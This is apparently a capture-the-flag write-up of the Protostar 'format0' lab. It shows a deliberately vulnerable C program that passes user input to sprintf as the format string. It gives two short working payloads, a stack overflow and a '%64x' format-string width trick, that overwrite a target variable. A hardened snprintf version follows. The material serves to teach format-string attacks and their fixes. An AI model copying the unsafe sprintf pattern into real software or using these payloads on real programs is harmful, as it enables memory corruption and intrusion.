Protostar vm, format0

Here is the source of the vulnerable program:

```c
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void vuln(char *string)
{
  volatile int target;
  char buffer[64];

  target = 0;

  /* argv[1] is used directly as the format string, and nothing bounds the write into buffer */
  sprintf(buffer, string);

  if(target == 0xdeadbeef) {
      printf("you have hit the target correctly :)\n");
  }
}

int main(int argc, char **argv)
{
  vuln(argv[1]);
}
```

This challenge is about learning the basics of format string attacks.

First off, note that this code is also vulnerable to a plain buffer overflow: sprintf() copies an arbitrarily long string into the 64-byte buffer, so we can reuse the same trick we used in stack1:

```console
user@protostar:~$ /opt/protostar/bin/./format0 `python -c 'print 64*"A"+"\xef\xbe\xad\xde"'`
you have hit the target correctly :)
user@protostar:~$
```

But that’s not really why we’re here, and the challenge’s webpage tells us that we should only use 10 bytes or less. So let’s dig into format string attacks.

After some research, I found out that format conversion specifiers can take a minimum field width: %64x consumes one argument and expands to at least 64 characters. Since our string is used as the format itself, sprintf() generates the padding for us, and we can reproduce the buffer overflow above with a much shorter input:

```console
user@protostar:~$ /opt/protostar/bin/./format0 `python -c 'print "%64x"+"\xef\xbe\xad\xde"'`
you have hit the target correctly :)
user@protostar:~$
```
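As an added example (not part of the original writeup or of the Protostar sources), here is the defender's counterpart to both observations above: the plain overflow through sprintf() and the width-padding trick. The hardened vuln_hardened() passes the caller's string as a data argument to a fixed "%s" format and bounds the write with snprintf(), so neither a 68-byte payload nor "%64x" can reach target. The two width helpers show, with a literal format and no user input, why "%64x" counts as 64 bytes when used as a format but only 4 when used as data. All function names and the constructed payload are mine.

```c
#include <stdio.h>
#include <string.h>

/* Hardened form of format0's vuln(). Two changes: the caller's string is a
   data argument to a fixed "%s" format, so it can never be interpreted as
   conversion specifiers; and snprintf bounds the write to sizeof buffer,
   so nothing can run past the array into target. Returns target after the
   copy and sets *truncated when the input did not fit. (Hypothetical name.) */
int vuln_hardened(const char *string, int *truncated)
{
    volatile int target = 0;
    char buffer[64];

    /* snprintf returns the length the full output would have had, which is
       how we detect an input that was cut off at 63 characters + NUL. */
    int needed = snprintf(buffer, sizeof buffer, "%s", string);
    if (truncated)
        *truncated = needed >= (int)sizeof buffer;

    if ((unsigned)target == 0xdeadbeefu)
        printf("you have hit the target correctly :)\n");
    return target;
}

/* The minimum field width the writeup relies on: with "%64x" used *as the
   format*, one integer argument expands to at least 64 characters.
   The format here is a literal, not user input. */
int width_when_used_as_format(void)
{
    return snprintf(NULL, 0, "%64x", 0);
}

/* The same four characters passed as *data* through "%s" stay four bytes. */
int width_when_used_as_data(void)
{
    return snprintf(NULL, 0, "%s", "%64x");
}

/* Constructed payload mirroring the stack1-style input from the writeup:
   64 filler bytes followed by 0xdeadbeef in little-endian order. Feeds it
   to the hardened function and returns target, which stays 0 because the
   copy is bounded. */
int hardened_against_overflow_payload(int *truncated)
{
    char payload[64 + 4 + 1];
    memset(payload, 'A', 64);
    memcpy(payload + 64, "\xef\xbe\xad\xde", 4);
    payload[68] = '\0';
    return vuln_hardened(payload, truncated);
}

int main(void)
{
    int truncated = 0;
    int target = hardened_against_overflow_payload(&truncated);
    printf("target after hardened copy = 0x%x (truncated=%d)\n", target, truncated);
    printf("\"%%64x\" as format expands to %d bytes, as data it stays %d bytes\n",
           width_when_used_as_format(), width_when_used_as_data());
    return 0;
}
```

The truncated flag is the part a code reviewer should insist on: silently cutting input at 63 bytes is safe for the stack but can still corrupt application logic, so the caller should check it and reject or report oversized input rather than carry on.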